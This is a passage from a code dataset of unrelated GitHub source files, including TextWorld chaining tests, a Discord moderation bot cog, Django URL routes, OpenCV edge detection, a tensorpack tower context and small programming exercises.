\"S\"))\n\ntp, fp, fn, tn = zip(*results)\ntp, fp, fn, tn = sum(tp), sum(fp), sum(fn), sum(tn)\n\np, r = tp/(tp+fp), tp/(tp+fn)\nprint (\"Total tokens in Train Set:\", tp+fp+fn+tn)\nprint (\"Total S in REF:\", tp+fn)\nprint (\"Total S in OUT:\", tp+fp)\nprint (\"Presicion:\", p)\nprint (\"Recall:\", r)\nprint (\"*******************F1-score:\", 2*p*r/(p+r))\nprint (datetime.datetime.now())\n'''","repo_name":"billxu0521/ALSS_tool","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28307088197","text":"from random import *\n\n#AFC\nafcsul = ['Jaguars', 'Titans', 'Colts', 'Texans']\nafcoeste = ['Chargers', 'Broncos', 'Raiders', 'Chiefs']\nafcnorte = ['Steelers', 'Browns', 'Bengals', 'Ravens']\nafcleste = ['Patriots', 'Dolphins', 'Bills', 'Jets']\n\n#NFC\nnfcsul = ['Saints', 'Buccaneers', 'Panthers', 'Falcons']\nnfcoeste = ['Seahaws', 'Rams', 'Cardinals', '49ers']\nnfcnorte = ['Packers', 'Bears', 'Vikings', 'Lions']\nnfcleste = ['Washington', 'Eagles', 'Cowboys', 'Giants']\n\n\nfor i in range(1, 17):\n\ta = chi","repo_name":"argosmaia/UERJ-python","sub_path":"RodadasNFL2.py","file_name":"RodadasNFL2.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26158472220","text":"from textworld.generator.data import KnowledgeBase\nfrom textworld.generator.chaining import ChainingOptions, QuestGenerationError\nfrom textworld.generator.chaining import get_chains, sample_quest\nfrom textworld.logic import GameLogic, Proposition, State, Variable\n\nimport numpy.testing as npt\n\n\ndef build_state(locked_door=False):\n # Set up a world with two rooms and a few objecs.\n P = Variable(\"P\")\n I = Variable(\"I\")\n bedroom = Variable(\"bedroom\", \"r\")\n kitchen = Variable(\"kitchen\", \"r\")\n rusty_key = Variable(\"rusty key\", \"k\")\n small_key = Variable(\"small key\", \"k\")\n wooden_door = Variable(\"wooden door\", \"d\")\n chest = Variable(\"chest\", \"c\")\n cabinet = Variable(\"cabinet\", \"c\")\n robe = Variable(\"robe\", \"o\")\n\n state = State(KnowledgeBase.default().logic, [\n Proposition(\"at\", [P, bedroom]),\n Proposition(\"south_of\", [kitchen, bedroom]),\n Proposition(\"north_of\", [bedroom, kitchen]),\n Proposition(\"link\", [bedroom, wooden_door, kitchen]),\n Proposition(\"link\", [kitchen, wooden_door, bedroom]),\n\n Proposition(\"locked\" if locked_door else \"closed\", [wooden_door]),\n\n Proposition(\"in\", [rusty_key, I]),\n Proposition(\"match\", [rusty_key, chest]),\n Proposition(\"locked\", [chest]),\n Proposition(\"at\", [chest, kitchen]),\n Proposition(\"in\", [small_key, chest]),\n\n Proposition(\"match\", [small_key, cabinet]),\n Proposition(\"locked\", [cabinet]),\n Proposition(\"at\", [cabinet, bedroom]),\n Proposition(\"in\", [robe, cabinet]),\n ])\n\n return state\n\n\ndef test_chaining():\n # The following test depends on the available rules,\n # so instead of depending on what is in rules.txt,\n # we define the allowed_rules to used.\n allowed_rules = KnowledgeBase.default().rules.get_matching(\"take/.*\")\n allowed_rules += KnowledgeBase.default().rules.get_matching(\"go.*\")\n allowed_rules += KnowledgeBase.default().rules.get_matching(\"insert.*\", \"put.*\")\n allowed_rules += KnowledgeBase.default().rules.get_matching(\"open.*\", \"close.*\")\n allowed_rules += KnowledgeBase.default().rules.get_matching(\"lock.*\", 
\"unlock.*\")\n allowed_rules += KnowledgeBase.default().rules.get_matching(\"eat.*\")\n\n class Options(ChainingOptions):\n def get_rules(self, depth):\n return allowed_rules\n\n options = Options()\n options.max_depth = 5\n options.max_length = 5\n\n # No possible action since the wooden door is locked and\n # the player doesn't have the key.\n state = build_state(locked_door=True)\n chains = list(get_chains(state, options))\n assert len(chains) == 0\n\n # Since there are no chains, trying to sample a quest will raise an error.\n npt.assert_raises(QuestGenerationError, sample_quest, state, options)\n\n # The door is now closed instead of locked.\n state = build_state(locked_door=False)\n chains = list(get_chains(state, options))\n assert len(chains) == 5\n\n # With more depth.\n state = build_state(locked_door=False)\n options.max_depth = 20\n options.max_length = 20\n chains = list(get_chains(state, options))\n assert len(chains) == 9\n\n\ndef test_applying_actions():\n state = build_state(locked_door=False)\n options = ChainingOptions()\n options.backward = True\n options.max_depth = 5\n chains = list(get_chains(state, options))\n\n expected_state = state\n for chain in chains:\n state = chain.initial_state.copy()\n for action in chain.actions:\n assert state.apply(action)\n\n assert expected_state == state\n\n\ndef test_going_through_door():\n P = Variable(\"P\", \"P\")\n room = Variable(\"room\", \"r\")\n kitchen = Variable(\"kitchen\", \"r\")\n state = State(KnowledgeBase.default().logic)\n state.add_facts([\n Proposition(\"at\", [P, room]),\n Proposition(\"north_of\", [kitchen, room]),\n Proposition(\"free\", [kitchen, room]),\n Proposition(\"free\", [room, kitchen]),\n Proposition(\"south_of\", [room, kitchen])\n ])\n\n options = ChainingOptions()\n options.backward = True\n options.max_depth = 3\n options.max_length = 3\n options.subquests = True\n options.create_variables = True\n options.rules_per_depth = [\n [KnowledgeBase.default().rules[\"take/c\"], KnowledgeBase.default().rules[\"take/s\"]],\n KnowledgeBase.default().rules.get_matching(\"go.*\"),\n [KnowledgeBase.default().rules[\"open/d\"]],\n ]\n\n chains = list(get_chains(state, options))\n assert len(chains) == 18\n # print()\n # for i, chain in enumerate(chains):\n # actions = [\"{}({})\".format(n.action.name, \", \".join(v.name for v in n.action.variables)) for n in chain.nodes[::-1]]\n # msg = \" -> \".join(actions)\n # print(\"{:2d}. {}\".format(i + 1, msg))\n #\n # 1. take/c(P, room, c_0, o_0, I)\n # 2. take/c(P, room, c_0, o_0, I) -> go/north(P, r_0, room)\n # 3. take/c(P, room, c_0, o_0, I) -> go/north(P, r_0, room) -> open/d(P, r_0, d_0, room)\n # 4. take/c(P, room, c_0, o_0, I) -> go/south(P, kitchen, room)\n # 5. take/c(P, room, c_0, o_0, I) -> go/south(P, kitchen, room) -> open/d(P, kitchen, d_0, room)\n # 6. take/c(P, room, c_0, o_0, I) -> go/east(P, r_0, room)\n # 7. take/c(P, room, c_0, o_0, I) -> go/east(P, r_0, room) -> open/d(P, r_0, d_0, room)\n # 8. take/c(P, room, c_0, o_0, I) -> go/west(P, r_0, room)\n # 9. take/c(P, room, c_0, o_0, I) -> go/west(P, r_0, room) -> open/d(P, r_0, d_0, room)\n # 10. take/s(P, room, s_0, o_0, I)\n # 11. take/s(P, room, s_0, o_0, I) -> go/north(P, r_0, room)\n # 12. take/s(P, room, s_0, o_0, I) -> go/north(P, r_0, room) -> open/d(P, r_0, d_0, room)\n # 13. take/s(P, room, s_0, o_0, I) -> go/south(P, kitchen, room)\n # 14. take/s(P, room, s_0, o_0, I) -> go/south(P, kitchen, room) -> open/d(P, kitchen, d_0, room)\n # 15. 
take/s(P, room, s_0, o_0, I) -> go/east(P, r_0, room)\n # 16. take/s(P, room, s_0, o_0, I) -> go/east(P, r_0, room) -> open/d(P, r_0, d_0, room)\n # 17. take/s(P, room, s_0, o_0, I) -> go/west(P, r_0, room)\n # 18. take/s(P, room, s_0, o_0, I) -> go/west(P, r_0, room) -> open/d(P, r_0, d_0, room)\n\n\ndef test_backward_chaining():\n P = Variable(\"P\", \"P\")\n room = Variable(\"room\", \"r\")\n kitchen = Variable(\"kitchen\", \"r\")\n state = State(KnowledgeBase.default().logic, [\n Proposition(\"at\", [P, room]),\n Proposition(\"north_of\", [kitchen, room]),\n Proposition(\"south_of\", [room, kitchen]),\n ])\n\n options = ChainingOptions()\n options.backward = True\n options.max_depth = 2\n options.max_length = 2\n options.subquests = True\n options.create_variables = True\n options.rules_per_depth = [\n [KnowledgeBase.default().rules[\"take/c\"], KnowledgeBase.default().rules[\"take/s\"]],\n [KnowledgeBase.default().rules[\"open/c\"]],\n ]\n options.restricted_types = {\"d\"}\n\n chains = list(get_chains(state, options))\n assert len(chains) == 3\n\n options = ChainingOptions()\n options.backward = True\n options.max_depth = 3\n options.max_length = 3\n options.subquests = True\n options.create_variables = True\n options.rules_per_depth = [\n [KnowledgeBase.default().rules[\"put\"]],\n [KnowledgeBase.default().rules[\"go/north\"]],\n [KnowledgeBase.default().rules[\"take/c\"]],\n ]\n options.restricted_types = {\"d\"}\n\n chains = list(get_chains(state, options))\n assert len(chains) == 3\n\n\ndef test_parallel_quests():\n logic = GameLogic.parse(\"\"\"\n type foo {\n rules {\n do_a :: not_a(foo) & $not_c(foo) -> a(foo);\n do_b :: not_b(foo) & $not_c(foo) -> b(foo);\n do_c :: $a(foo) & $b(foo) & not_c(foo) -> c(foo);\n }\n\n constraints {\n a_or_not_a :: a(foo) & not_a(foo) -> fail();\n b_or_not_b :: b(foo) & not_b(foo) -> fail();\n c_or_not_c :: c(foo) & not_c(foo) -> fail();\n }\n }\n \"\"\")\n kb = KnowledgeBase(logic, \"\")\n\n state = State(kb.logic, [\n Proposition.parse(\"a(foo)\"),\n Proposition.parse(\"b(foo)\"),\n Proposition.parse(\"c(foo)\"),\n ])\n\n options = ChainingOptions()\n options.backward = True\n options.kb = kb\n\n options.max_depth = 3\n options.max_breadth = 1\n options.max_length = 3\n chains = list(get_chains(state, options))\n assert len(chains) == 2\n\n options.max_breadth = 2\n chains = list(get_chains(state, options))\n assert len(chains) == 3\n\n options.min_breadth = 2\n chains = list(get_chains(state, options))\n assert len(chains) == 1\n assert len(chains[0].actions) == 3\n assert chains[0].nodes[0].depth == 2\n assert chains[0].nodes[0].breadth == 2\n assert chains[0].nodes[0].parent == chains[0].nodes[2]\n assert chains[0].nodes[1].depth == 2\n assert chains[0].nodes[1].breadth == 1\n assert chains[0].nodes[1].parent == chains[0].nodes[2]\n assert chains[0].nodes[2].depth == 1\n assert chains[0].nodes[2].breadth == 1\n assert chains[0].nodes[2].parent is None\n\n options.min_breadth = 1\n options.create_variables = True\n state = State(kb.logic)\n chains = list(get_chains(state, options))\n assert len(chains) == 5\n\n\ndef test_parallel_quests_navigation():\n logic = GameLogic.parse(\"\"\"\n type P {\n }\n\n type I {\n }\n\n type r {\n rules {\n move :: at(P, r) & $free(r, r') -> at(P, r');\n }\n\n constraints {\n atat :: at(P, r) & at(P, r') -> fail();\n }\n }\n\n type o {\n rules {\n take :: $at(P, r) & at(o, r) -> in(o, I);\n }\n\n constraints {\n inat :: in(o, I) & at(o, r) -> fail();\n }\n }\n\n type flour : o {\n }\n\n type eggs : o {\n }\n\n 
type cake {\n rules {\n bake :: in(flour, I) & in(eggs, I) -> in(cake, I) & in(flour, cake) & in(eggs, cake);\n }\n\n constraints {\n inincake :: in(o, I) & in(o, cake) -> fail();\n atincake :: at(o, r) & in(o, cake) -> fail();\n }\n }\n \"\"\")\n kb = KnowledgeBase(logic, \"\")\n\n state = State(kb.logic, [\n Proposition.parse(\"at(P, r3: r)\"),\n Proposition.parse(\"free(r2: r, r3: r)\"),\n Proposition.parse(\"free(r1: r, r2: r)\"),\n ])\n\n bake = [kb.logic.rules[\"bake\"]]\n non_bake = [r for r in kb.logic.rules.values() if r.name != \"bake\"]\n\n options = ChainingOptions()\n options.backward = True\n options.create_variables = True\n options.min_depth = 3\n options.max_depth = 3\n options.min_breadth = 2\n options.max_breadth = 2\n options.max_length = 6\n options.kb = kb\n options.rules_per_depth = [bake, non_bake, non_bake]\n options.restricted_types = {\"P\", \"r\"}\n chains = list(get_chains(state, options))\n assert len(chains) == 2\n","repo_name":"microsoft/TextWorld","sub_path":"textworld/generator/tests/test_chaining.py","file_name":"test_chaining.py","file_ext":"py","file_size_in_byte":10931,"program_lang":"python","lang":"en","doc_type":"code","stars":1102,"dataset":"github-code","pt":"21"} +{"seq_id":"17526932204","text":"#!/usr/bin/env python3\n\n\"\"\"Functions which print and analyze computed results.\"\"\"\n\nimport numpy\n\n\ndef print_results(neighbors, words, out_file):\n \"\"\"\n Prints the computed results to an output file.\n\n neighbors - A list of lists containing the neighbors of each word.\n words - The full list of words.\n out_file - The file on which the results will be written.\n \"\"\"\n\n nwords = len(neighbors)\n\n for i, neighbors_i in enumerate(neighbors):\n out_file.write(\"%s: \" % words[i])\n out_file.write(\" \".join(sorted([words[j] for j in neighbors_i])))\n out_file.write(\"\\n\")\n out_file.write(\"\\n\")\n\n\ndef print_stats(neighbors, min_wlen, max_dist, stats_file):\n \"\"\"\n Analyzes and prints basic statistics about the results obtained.\n\n neighbors - A list of lists containing the neighbors of each word.\n min_wlen - The smallest word length considered (smaller words are ignored).\n max_dist - The maximum considered distance between words.\n stats_file - The file on which the statistics data will be written.\n \"\"\"\n\n nwords = len(neighbors)\n\n # counters contain the number of neighbors for each word\n counters = numpy.array([len(x) for x in neighbors], dtype=numpy.int8)\n\n stats_file.write(\"Number of words analyzed: %d\\n\" % nwords)\n stats_file.write(\"Smallest word length considered: %d\\n\" % min_wlen)\n stats_file.write(\n \"Number of words within distance %d from any word\\n\" % max_dist)\n stats_file.write(\"\\tmean : %f\\n\" % numpy.mean(counters))\n stats_file.write(\"\\tstd.dev.: %f\\n\\n\" % numpy.std(counters))\n\n\ndef print_histogram(neighbors, plot_hist, hist_file):\n \"\"\"\n Writes all histogram data (neighbor counter frequency) to a file.\n\n neighbors - A list of lists containing the neighbors of each word.\n plot_hist - True if the final histogram should be plotted, False otherwise.\n hist_file - The file on which the histogram data will be written.\n \"\"\"\n\n nwords = len(neighbors)\n\n # counters contain the number of neighbors for each word\n counters = numpy.array([len(x) for x in neighbors], dtype=numpy.int8)\n\n # we need at least one bin (otherwise an exception will be thrown)\n nbins = max(1, max(counters) - min(counters))\n\n hist, bins = numpy.histogram(counters, bins=nbins, density=True)\n\n 
for x, y in zip(bins, hist):\n hist_file.write(\"%d %f\\n\" % (x, y))\n\n if plot_hist:\n import matplotlib.pyplot as pyplot\n\n width = 0.7 * (bins[1] - bins[0])\n center = (bins[:-1] + bins[1:]) / 2 - 0.5\n pyplot.bar(center, hist, align=\"center\", width=width)\n pyplot.show()\n","repo_name":"dassencio/langcmp","sub_path":"results.py","file_name":"results.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"34291875517","text":"import json\nfrom itertools import cycle\nimport discord\nfrom discord.ext import commands, tasks\nimport random\nfrom discord.ext.commands.cooldowns import BucketType\nfrom discord.utils import get\nfrom discord.ext import commands\nimport time\nimport aiohttp\nfrom discord import Webhook, AsyncWebhookAdapter\nimport sys, traceback\n\n\nclass Admin_Commands(commands.Cog):\n def __init__(self, client):\n self.client = client\n\n\n @commands.command()\n @commands.has_permissions(ban_members=True)\n @commands.bot_has_permissions(ban_members=True)\n async def ban(self, ctx, member: discord.Member, *, reason=None):\n await member.ban(reason=f\"Breeze Bot Ban - Responsible User : {ctx.author.name} | Reason : {reason}\")\n await ctx.send(f'Banned {member.mention}')\n\n\n @commands.command(aliases=[\"removeban\"])\n @commands.has_permissions(ban_members=True)\n @commands.bot_has_permissions(ban_members=True)\n async def unban(self, ctx, *, member):\n banned_users = await ctx.guild.bans()\n member_name, member_discriminator = member.split(\"#\")\n for ban_entry in banned_users:\n user = ban_entry.user\n\n if (user.name, user.discriminator) == (member_name, member_discriminator):\n await ctx.guild.unban(user)\n await ctx.send(f'Unbanned {user.name}#{user.discriminator}')\n\n\n @commands.command()\n @commands.has_permissions(kick_members=True)\n @commands.bot_has_permissions(kick_members=True)\n async def kick(self, ctx, member: discord.Member, *, reason=None):\n await member.kick(f\"Breeze Bot Kick - Responsible User : {ctx.author.name} | Reason : {reason}\")\n await ctx.send(f'{member.mention} was kicked! 
')\n\n\n @commands.command(aliases=[\"changeprefix\", \"prefixchange\", \"newprefix\", \"new_prefix\"])\n @commands.has_permissions(administrator=True)\n @commands.bot_has_permissions(administrator=True)\n async def prefix(self, ctx, new_prefix):\n with open(\"prefixes.json\", 'r') as f:\n prefixes = json.load(f)\n prefixes[str(ctx.guild.id)] = new_prefix\n\n with open(\"prefixes.json\", \"w\") as f:\n json.dump(prefixes, f, indent=4)\n\n await ctx.send(f\"Prefix changed to {new_prefix}\")\n\n\n @commands.command(aliases=[\"send\"])\n @commands.has_permissions(manage_messages=True)\n @commands.bot_has_permissions(manage_messages=True)\n async def say(self, ctx, channel: discord.TextChannel = None, *, content: str):\n channel = channel if channel else ctx.channel\n await ctx.message.delete()\n await channel.send(content)\n\n\n @commands.command(aliases=[\"clear\"])\n @commands.has_permissions(manage_messages=True)\n @commands.bot_has_permissions(manage_messages=True)\n async def purge(self, ctx, *, amount=5):\n await ctx.message.delete()\n await ctx.channel.purge(limit=amount)\n\n\n @commands.command(aliases=[\"addrole\", \"removerole\"])\n @commands.has_permissions(manage_roles=True)\n @commands.bot_has_permissions(manage_roles=True)\n async def role(self, ctx, role: discord.Role, user: discord.Member):\n if role in user.roles:\n await user.remove_roles(role)\n else:\n await user.add_roles(role)\n\n\n @commands.command(aliases=[\"moveto\", \"move_to\", \"movechannel\", \"move_channel\"])\n @commands.has_permissions(administrator=True)\n @commands.bot_has_permissions(administrator=True)\n async def move(self, ctx, member: discord.Member, channel: discord.VoiceChannel):\n await ctx.message.delete()\n await member.move_to(channel, reason=None)\n\n\n @commands.command(aliases=[\"pm\"])\n @commands.has_permissions(administrator=True)\n @commands.bot_has_permissions(administrator=True)\n async def dm(self, ctx, member: discord.Member, *, text):\n await ctx.message.delete()\n await member.send(f\"Message from {ctx.author}: {text}\")\n\n\ndef setup(client):\n client.add_cog(Admin_Commands(client))\n","repo_name":"shabman/Breeze","sub_path":"cogs/Admin.py","file_name":"Admin.py","file_ext":"py","file_size_in_byte":3960,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"28064786446","text":"from django.conf.urls import url\n\nfrom redditalpha.api.decks import views\n\n\nurlpatterns = [\n url(r'^test$', views.test, name='test'), # yes, you can delete this\n url(r'^$', views.index, name='index'),\n url(r'^mine$', views.mine, name='mine'),\n url(r'^(?P\\d+)/delete$', views.delete, name='delete'),\n url(r'^(?P\\d+)/copy$', views.copy, name='copy'),\n url(r'^(?P\\d+)/favorite$', views.favorite, name='favorite'),\n url(r'^(?P\\d+)/upvote$', views.upvote, name='upvote'),\n url(r'^(?P\\d+)/downvote$', views.downvote, name='downvote'),\n url(r'^(?P\\d+)/notes$', views.notes, name='notes'),\n url(r'^(?P\\d+)/hand/starter$', views.hand_starter, name='hand_starter'),\n url(r'^(?P\\d+)/tags/add$', views.add_tag, name='add_tag'),\n url(r'^(?P\\d+)/tags/delete$', views.delete_tag, name='delete_tag'),\n]\n","repo_name":"kjg531/RA","sub_path":"redditalpha/api/decks/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"35745279832","text":"class BinaryTreeNode:\n def __init__(self, data):\n self.data = data\n self.left = None\n 
self.right = None\n\ndef printdetailedTree(root):\n if root == None:\n return\n print(root.data, end=\" : \")\n if root.left:\n print(\"L:\", root.left.data, end=\" \")\n if root.right:\n print(\"R:\", root.right.data, end=\" \")\n print()\n\n printdetailedTree(root.left)\n printdetailedTree(root.right)\n\n\ndef takeInput():\n rootData = int(input())\n if rootData == -1 :\n return None\n\n root = BinaryTreeNode(rootData)\n leftTree = takeInput()\n righttree = takeInput()\n root.left = leftTree\n root.right = righttree\n\n return root\n\ndef numofLeafNodes(root):\n if root is None:\n return 0\n\n if root.left == None and root.right == None:\n return 1\n\n nleftleaf = numofLeafNodes(root.left)\n nrightleaf = numofLeafNodes(root.right)\n\n return nleftleaf + nrightleaf\n\nx = takeInput()\nprintdetailedTree(x)\nprint(numofLeafNodes(x))","repo_name":"jyotijauhari/DSA-questions-Python","sub_path":"11_00_tree/binaryTree/countNumofLeafNodes.py","file_name":"countNumofLeafNodes.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"73036638133","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# File: tower.py\n# Author: Yuxin Wu \n\nimport tensorflow as tf\nimport re\nfrom ..utils.naming import PREDICT_TOWER\n\n__all__ = ['get_current_tower_context', 'TowerContext']\n\n_CurrentTowerContext = None\n\n\nclass TowerContext(object):\n \"\"\" A context where the current model is being built in. \"\"\"\n\n def __init__(self, tower_name, is_training=None):\n \"\"\"\n Args:\n tower_name (str): 'tower0', 'towerp0', or ''\n is_training (bool): if None, automatically determine from tower_name.\n \"\"\"\n self._name = tower_name\n if is_training is None:\n is_training = not self._name.startswith(PREDICT_TOWER)\n self._is_training = is_training\n\n @property\n def is_main_training_tower(self):\n return self.is_training and (self._name == '' or self._name == 'tower0')\n\n @property\n def is_main_tower(self):\n return self._name == '' or self._name == 'tower0'\n\n @property\n def is_training(self):\n return self._is_training\n\n @property\n def name(self):\n return self._name\n\n def get_variable_on_tower(self, *args, **kwargs):\n \"\"\"\n Get a variable for this tower specifically, without reusing, even if\n it is called under a ``reuse=True`` variable scope.\n\n Tensorflow doesn't allow us to disable reuse under a\n ``reuse=True`` scope. 
This method provides a work around.\n See https://www.tensorflow.org/versions/master/how_tos/variable_scope/index.html#basics-of-tfvariable-scope\n\n Args:\n args: same as ``tf.get_variable()``.\n \"\"\"\n with tf.variable_scope(self._name) as scope:\n with tf.variable_scope(scope, reuse=False):\n scope = tf.get_variable_scope()\n assert not scope.reuse\n return tf.get_variable(*args, **kwargs)\n\n def find_tensor_in_main_tower(self, graph, name):\n if self.is_main_tower:\n return graph.get_tensor_by_name(name)\n if name.startswith(PREDICT_TOWER):\n predict_tower_prefix = '{}[0-9]+/'.format(PREDICT_TOWER)\n newname = re.sub(predict_tower_prefix, '', name)\n try:\n return graph.get_tensor_by_name(newname)\n except KeyError:\n newname = re.sub(predict_tower_prefix, 'tower0/', name)\n return graph.get_tensor_by_name(newname)\n\n @staticmethod\n def get_predict_tower_name(towerid=0, prefix=''):\n \"\"\"\n Args:\n towerid(int): an integer, the id of this predict tower, usually\n used to choose the GPU id.\n prefix(str): an alphanumeric prefix.\n Returns:\n str: the final tower name used to create a predict tower.\n Currently it is ``PREDICT_TOWER + prefix + towerid``.\n \"\"\"\n assert prefix == '' or prefix.isalnum()\n return PREDICT_TOWER + prefix + str(towerid)\n\n def __enter__(self):\n global _CurrentTowerContext\n assert _CurrentTowerContext is None, \\\n \"Nesting TowerContext!\"\n _CurrentTowerContext = self\n # TODO enter name_scope(None) first\n if len(self._name):\n self._scope = tf.name_scope(self._name)\n return self._scope.__enter__()\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n global _CurrentTowerContext\n _CurrentTowerContext = None\n if len(self._name):\n self._scope.__exit__(exc_type, exc_val, exc_tb)\n return False\n\n def __str__(self):\n return \"TowerContext(name={}, is_training={})\".format(\n self._name, self._is_training)\n\n\ndef get_current_tower_context():\n global _CurrentTowerContext\n return _CurrentTowerContext\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/ppwwyyxx_tensorpack/tensorpack-master/tensorpack/tfutils/tower.py","file_name":"tower.py","file_ext":"py","file_size_in_byte":3800,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"41330548523","text":"# Written: 03-Apr-2020\n# https://www.hackerrank.com/challenges/polar-coordinates/problem\n\n# Enter your code here. Read input from STDIN. 
Print output to STDOUT\n\nimport cmath\n\nif __name__ == '__main__':\n z = input()\n print(abs(complex(z)))\n print(cmath.phase(complex(z)))","repo_name":"elmoallistair/hackerrank","sub_path":"Python/Math/Polar Coordinates.py","file_name":"Polar Coordinates.py","file_ext":"py","file_size_in_byte":279,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"3136292911","text":"# importing PIL \nfrom PIL import Image \nimport cv2\nimport sys\nimport numpy\n\nprint(sys.argv[0]);\n\ndef canny():\n\t# read the image\n\timg = cv2.imread(sys.argv[1])\n\n\t# conver to gray scale\n\tgray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n\tblurred = cv2.GaussianBlur(gray, (7, 7), 0)\n\n\t# we found on of the best algorithms to detect the edges named: Canny\n\t# documentation: https://docs.opencv.org/3.1.0/da/d22/tutorial_py_canny.html\n\tedges = cv2.Canny(blurred, 35, 50)\n\n\tprint_image(edges)\n\ndef print_image(edges):\n\t# print the image\n\tA = numpy.squeeze(numpy.asarray(edges))\n\timg = Image.fromarray(A)\n\timg.save(sys.argv[2])\n\n\ndef edgeDetection():\n\t# structured forests and fast edge detection\n\n\t# 1. Load source color image\n\timg = cv2.imread(sys.argv[1])\n\n\t# 2. Convert source image to [0;1] range\n\tgray = numpy.divide(img, 255)\n\n\tprint_image(gray)\n\n\t# 3. Run main algorithm\n\t# cv::Mat edges(image.size(), image.type());\n\t# cv::Ptr pDollar =\n\t# cv::createStructuredEdgeDetection(modelFilename);\n\t# pDollar->detectEdges(image, edges);\n\t# 4. Show results\n\t# if ( outFilename == \"\" )\n\t# {\n\t# cv::namedWindow(\"edges\", 1);\n\t# cv::imshow(\"edges\", edges);\n\t# cv::waitKey(0);\n\t# }\n\t# else cv::imwrite(outFilename, 255*edges)\n\ncanny()\n\n\n","repo_name":"Sibel-Leila/glass-detection","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9382381369","text":"import math\nimport copy\n\nX = []\n\nwith open(\"0_Data.txt\") as fileInput:\n file = list(fileInput)\n\nfor line in file:\n C = line.strip()\n C = C.split()\n X.append(C)\n\ntab = \" \"\n\nclass directory(object):\n def __init__(self, name):\n self.files = []\n self.directories = []\n self.directorynames = []\n self.name = name\n \n def getSize(self):\n s = 0\n for i in self.files:\n s += i.getSize()\n for i in self.directories:\n s += i.getSize()\n return s\n \n def printDirectory(self, numIndents=0):\n s = \"\"\n for i in range(numIndents):\n s += tab\n print(s + \" - \" + self.name + \" (dir, total size = \" + str(self.getSize()) + \")\")\n for i in self.files:\n i.printFile(numIndents + 1)\n for i in self.directories:\n i.printDirectory(numIndents + 1)\n \n def addDirectory(self, location, name):\n l = copy.deepcopy(location)\n if len(l) != 1:\n l.pop(0)\n self.directories[self.directorynames.index(l[0])].addDirectory(l, name)\n else:\n self.directorynames.append(name)\n self.directories.append(directory(name))\n \n def addFile(self, location, name, size):\n l = copy.deepcopy(location)\n if len(l) != 1:\n l.pop(0)\n self.directories[self.directorynames.index(l[0])].addFile(l, name, size)\n else:\n self.files.append(file(name, size))\n \n def addSmallFiles(self, s=0):\n sui = 0\n if self.getSize() <= 100000:\n sui += self.getSize()\n for i in self.directories:\n sui += i.addSmallFiles(s = sui)\n return sui\n \n def allDirectorySizes(self):\n sizes = [self.getSize()]\n for i in self.directories:\n j = 
i.allDirectorySizes()\n for k in j:\n sizes.append(k)\n return sizes\n \n\nclass file(object):\n def __init__(self, name, size):\n self.name = name\n self.size = int(size) #im stupid lmao\n \n def getSize(self):\n return self.size\n \n def printFile(self, numIndents):\n s = \"\"\n for i in range(numIndents):\n s += tab\n print(s + \" - \" + self.name + \" (file, size = \" + str(self.size) + \")\")\n\nmain = directory(\"/\")\nlocation = []\n\nfor i in X:\n if i[0] == \"$\":\n if i[1] == \"cd\":\n if i[2] == \"..\":\n location.pop()\n else:\n location.append(i[2])\n else:\n if i[0] == \"dir\":\n main.addDirectory(location, i[1])\n else:\n main.addFile(location, i[1], i[0])\n\nmain.printDirectory()\nt = main.allDirectorySizes()\nminimum = 99999999\nrequirement = t[0] - 40000000\nfor i in t:\n if i >= requirement:\n if i < minimum:\n minimum = i\nprint(minimum)","repo_name":"skeole/AdventOfCode","sub_path":"07_NoSpaceLeftOnDevice.py","file_name":"07_NoSpaceLeftOnDevice.py","file_ext":"py","file_size_in_byte":2908,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"34196536537","text":"import time\n\nimport yaml\n\nfrom cflib.crazyflie.mem import LighthouseBsCalibration\nfrom cflib.crazyflie.mem import LighthouseBsGeometry\nfrom cflib.crazyflie.mem import LighthouseMemHelper\n\n\nclass LighthouseConfigFileManager:\n TYPE_ID = 'type'\n TYPE = 'lighthouse_system_configuration'\n VERSION_ID = 'version'\n VERSION = '1'\n GEOS_ID = 'geos'\n CALIBS_ID = 'calibs'\n SYSTEM_TYPE_ID = 'systemType'\n\n SYSTEM_TYPE_V1 = 1\n SYSTEM_TYPE_V2 = 2\n\n @staticmethod\n def write(file_name, geos={}, calibs={}, system_type=SYSTEM_TYPE_V2):\n file = open(file_name, 'w')\n with file:\n file_geos = {}\n for id, geo in geos.items():\n if geo.valid:\n file_geos[id] = geo.as_file_object()\n\n file_calibs = {}\n for id, calib in calibs.items():\n if calib.valid:\n file_calibs[id] = calib.as_file_object()\n\n data = {\n LighthouseConfigFileManager.TYPE_ID: LighthouseConfigFileManager.TYPE,\n LighthouseConfigFileManager.VERSION_ID: LighthouseConfigFileManager.VERSION,\n LighthouseConfigFileManager.SYSTEM_TYPE_ID: system_type,\n LighthouseConfigFileManager.GEOS_ID: file_geos,\n LighthouseConfigFileManager.CALIBS_ID: file_calibs\n }\n\n yaml.dump(data, file)\n\n @staticmethod\n def read(file_name):\n file = open(file_name, 'r')\n with file:\n data = yaml.safe_load(file)\n\n if LighthouseConfigFileManager.TYPE_ID not in data:\n raise Exception('Type field 